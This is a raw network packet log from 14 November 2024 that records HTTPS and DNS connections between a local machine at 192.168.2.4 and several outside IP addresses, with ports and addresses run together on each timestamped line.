                            Nov 14, 2024 23:38:01.013577938 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.013745070 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:01.159097910 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:01.159188032 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.160304070 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.162201881 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:01.203327894 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.405072927 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.405251026 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.405324936 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:01.410552979 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:01.410603046 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.410634041 CET49745443192.168.2.4184.28.90.27
                            Nov 14, 2024 23:38:01.410650015 CET44349745184.28.90.27192.168.2.4
                            Nov 14, 2024 23:38:01.574048042 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:01.574388981 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:01.574414015 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:01.574716091 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:01.575268030 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:01.575320959 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:01.615962982 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:01.994327068 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:01.994398117 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:01.994452000 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:01.995094061 CET49744443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:01.995111942 CET44349744162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.237220049 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.243691921 CET4974853192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:02.248784065 CET53497481.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:02.249093056 CET4974853192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:02.249284029 CET4974853192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:02.249284029 CET4974853192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:02.254626036 CET53497481.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:02.254640102 CET53497481.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:02.279356003 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.403923035 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.403980017 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.404000998 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.404032946 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.404047966 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.404076099 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.446919918 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.522043943 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.522068024 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.522109032 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.522154093 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.522356033 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.522375107 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.522417068 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.522433043 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.524035931 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.524055958 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.524110079 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.524137020 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.554167032 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.554234028 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.641093969 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.641169071 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.641678095 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.641733885 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.642690897 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.642769098 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.643059015 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.643119097 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.643939972 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.644007921 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.644857883 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.644917011 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.673157930 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.673228979 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.759538889 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.759614944 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.759852886 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.759915113 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.760287046 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.760354042 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.760919094 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.760987997 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.761461020 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.761524916 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.762013912 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.762077093 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.762588978 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.762650967 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.763058901 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.763139009 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.763583899 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.763716936 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.763767958 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.763786077 CET49746443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:02.763801098 CET44349746162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:02.844130993 CET53497481.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:02.844640017 CET4974853192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:02.844722033 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:02.844814062 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:02.844904900 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:02.845184088 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:02.845221043 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:02.850109100 CET53497481.1.1.1192.168.2.4
                            Nov 14, 2024 23:38:02.850169897 CET4974853192.168.2.41.1.1.1
                            Nov 14, 2024 23:38:03.455739021 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.456089973 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.456151009 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.457212925 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.457288980 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.461074114 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.461147070 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.461328983 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.461345911 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.510760069 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.705111027 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.705199957 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.705220938 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.705260992 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.705293894 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.705367088 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.705367088 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.705367088 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.705400944 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.705461979 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.706589937 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.706634045 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.706697941 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.706713915 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.706743956 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.706840992 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.820657969 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.820687056 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.820735931 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.820822954 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.820869923 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.820871115 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.820871115 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.830554008 CET49749443192.168.2.413.226.184.88
                            Nov 14, 2024 23:38:03.830617905 CET4434974913.226.184.88192.168.2.4
                            Nov 14, 2024 23:38:03.847724915 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:03.847773075 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:03.847842932 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:03.848817110 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:03.848838091 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:03.861840010 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:03.861880064 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:03.861993074 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:03.862193108 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:03.862209082 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:04.523809910 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.524058104 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.524075985 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.525235891 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.525573015 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.525686979 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.525692940 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.525738001 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.570476055 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.697417021 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.697560072 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.697623968 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.697824955 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.697841883 CET44349750162.144.0.229192.168.2.4
                            Nov 14, 2024 23:38:04.697849989 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.697897911 CET49750443192.168.2.4162.144.0.229
                            Nov 14, 2024 23:38:04.707966089 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:04.708219051 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:04.708244085 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:04.711783886 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:04.711848021 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:04.712351084 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:04.712428093 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:04.712600946 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:04.712608099 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:04.757947922 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.072531939 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.072606087 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.072626114 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.072664976 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.072664022 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.072694063 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.072695017 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.072710991 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.072712898 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.072732925 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.072757959 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.074182987 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.074237108 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.074258089 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.074265957 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.074300051 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.074311972 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.189702988 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.189764023 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.189779997 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.189793110 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.189817905 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.189846039 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.189861059 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.189909935 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.189913988 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.190035105 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.190087080 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:05.190093040 CET4434975113.35.58.12192.168.2.4
                            Nov 14, 2024 23:38:05.190103054 CET49751443192.168.2.413.35.58.12
                            Nov 14, 2024 23:38:07.732559919 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:38:07.732726097 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:38:07.733283043 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:38:08.618613005 CET49739443192.168.2.4142.250.184.196
                            Nov 14, 2024 23:38:08.618691921 CET44349739142.250.184.196192.168.2.4
                            Nov 14, 2024 23:38:36.016484976 CET5513553192.168.2.4162.159.36.2
                            Nov 14, 2024 23:38:36.021857977 CET5355135162.159.36.2192.168.2.4
                            Nov 14, 2024 23:38:36.022049904 CET5513553192.168.2.4162.159.36.2
                            Nov 14, 2024 23:38:36.022049904 CET5513553192.168.2.4162.159.36.2
                            Nov 14, 2024 23:38:36.027272940 CET5355135162.159.36.2192.168.2.4
                            Nov 14, 2024 23:38:36.624878883 CET5355135162.159.36.2192.168.2.4
                            Nov 14, 2024 23:38:36.625530005 CET5513553192.168.2.4162.159.36.2
                            Nov 14, 2024 23:38:36.631937027 CET5355135162.159.36.2192.168.2.4
                            Nov 14, 2024 23:38:36.631994963 CET5513553192.168.2.4162.159.36.2
                            Nov 14, 2024 23:38:50.165304899 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:50.165344954 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:50.165412903 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:50.165630102 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:50.165647984 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:50.906636953 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:50.906699896 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:50.908163071 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:50.908180952 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:50.908432961 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:50.917056084 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:50.959330082 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.138516903 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.138578892 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.138633013 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.138648033 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.138696909 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.164423943 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.164482117 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.164491892 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.164509058 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.164531946 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.164546013 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.255825996 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.255886078 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.255899906 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.255908966 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.255935907 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.255954981 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.294433117 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.294456959 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.294497013 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.294502020 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.294533014 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.296890020 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.296907902 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.296958923 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.296962976 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.296994925 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.297665119 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.297679901 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.297751904 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.297751904 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.297758102 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.297802925 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.372725964 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.372744083 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.372781992 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.372792959 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.372836113 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.397910118 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.397968054 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.397974014 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.397995949 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.398016930 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.398030996 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.411310911 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.411402941 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.411405087 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.411432028 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.411448956 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.411464930 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.412189960 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.412241936 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.412250042 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.412265062 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.412300110 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.413192034 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.413204908 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.413249016 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.413253069 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.413311005 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.414443016 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.414457083 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.414510965 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.414516926 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.414547920 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.490174055 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.490241051 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.490300894 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.490300894 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.490305901 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.490390062 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.490495920 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.490622044 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.490622044 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.490633965 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.490643024 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.490654945 CET55138443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.490658998 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.490674019 CET4435513813.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.529242992 CET55139443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.529294014 CET4435513913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.529505968 CET55139443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.530730009 CET55140443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.530761957 CET4435514013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.530951023 CET55140443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.531382084 CET55139443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.531407118 CET4435513913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.532167912 CET55141443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.532257080 CET4435514113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.532614946 CET55141443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.532726049 CET55141443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.532756090 CET4435514113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.532788038 CET55142443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.532802105 CET4435514213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.532891989 CET55142443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.532891989 CET55140443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.532911062 CET4435514013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.533638954 CET55143443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.533720016 CET55142443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.533723116 CET4435514313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.533731937 CET4435514213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:51.533818007 CET55143443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.533885956 CET55143443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:51.533904076 CET4435514313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.266546965 CET4435513913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.267102003 CET55139443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.267167091 CET4435513913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.267332077 CET4435514113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.267505884 CET55139443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.267559052 CET4435513913.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.267827988 CET55141443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.267888069 CET4435514113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.268275023 CET55141443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.268327951 CET4435514113.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.270975113 CET4435514313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.271488905 CET55143443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.271575928 CET4435514313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.271704912 CET55143443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.271722078 CET4435514313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.271892071 CET4435514213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.272180080 CET55142443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.272196054 CET4435514213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.272509098 CET55142443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.272514105 CET4435514213.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.303617001 CET4435514013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.303898096 CET55140443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.303910017 CET4435514013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.304296017 CET55140443192.168.2.413.107.246.45
                            Nov 14, 2024 23:38:52.304300070 CET4435514013.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.419868946 CET4435514313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.419904947 CET4435514313.107.246.45192.168.2.4
                            Nov 14, 2024 23:38:52.420016050 CET4435513913.107.246.45192.168.2.4
